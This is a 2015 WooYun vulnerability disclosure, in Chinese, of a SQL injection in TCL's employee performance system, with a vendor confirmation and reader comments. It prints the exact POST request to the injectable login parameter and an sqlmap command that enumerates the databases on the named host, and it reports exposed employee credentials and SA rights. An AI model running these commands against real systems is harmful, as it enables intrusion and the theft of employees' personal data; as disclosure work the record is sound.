当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090826

漏洞标题:TCL员工绩效管理系统SQL注入致数万员工敏感信息泄露

相关厂商:TCL官方网上商城

漏洞作者: 深度安全实验室

提交时间:2015-01-09 15:52

修复时间:2015-02-23 15:54

公开时间:2015-02-23 15:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-09: 细节已通知厂商并且等待厂商处理中
2015-01-10: 厂商已经确认,细节仅向厂商公开
2015-01-20: 细节向核心白帽子及相关领域专家公开
2015-01-30: 细节向普通白帽子公开
2015-02-09: 细节向实习白帽子公开
2015-02-23: 细节向公众公开

简要描述:

详细说明:

漏洞证明:

1.TCL员工绩效管理系统存在POST型SQL注入,UserName参数存在问题:

POST /AjaxHelper/AjaxHelper.aspx HTTP/1.1
Host: cts.tcl.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://cts.tcl.com/goto.aspx
Content-Length: 34
Cookie: ASP.NET_SessionId=horfzw0tol42bpf11zvpfj3z
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
method=login&UserName=a&PassWord=a


2.运行sqlmap,发现20个库:

sqlmap.py -u "http://cts.tcl.com/AjaxHelper/AjaxHelper.aspx" --data "method=login&UserName=a&PassWord=a" --dbs

1.png


3.以数据库“TCL_CTS”中表“Cts_UserLogin”为例,发现数万员工邮箱、工号、密码等敏感信息:

2.png


4.运行Pangolin,发现用户是SA权限:

5.png


5.内网IP地址:

3.png


6.内网文件目录:

4.png


7.我就是一屌丝码农,勿查水表,勿请喝茶,谢谢!

修复方案:

过滤

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-01-10 22:29

厂商回复:

感谢你的工作,和对我们支持。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-09 16:42 | 点点 ( 普通白帽子 | Rank:214 漏洞数:38 | 准备申请سمَـَّوُوُحخ ̷̴̐...)
  2. 2015-01-09 16:49 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    原则上是不通过重复提交的,但是当前案例内容危害较大,历史也有过几次提交,厂商应当重视

  3. 2015-01-09 16:56 | 深度安全实验室 ( 核心白帽子 | Rank:1936 漏洞数:315 )

    @浩天 虽然是同一个网站,但是注入点不同,应该不能算是重复提交吧?

  4. 2015-02-13 11:44 | ubuntu ( 普通白帽子 | Rank:148 漏洞数:12 | 一切皆有可能……)

    有创新,O(∩_∩)O哈哈~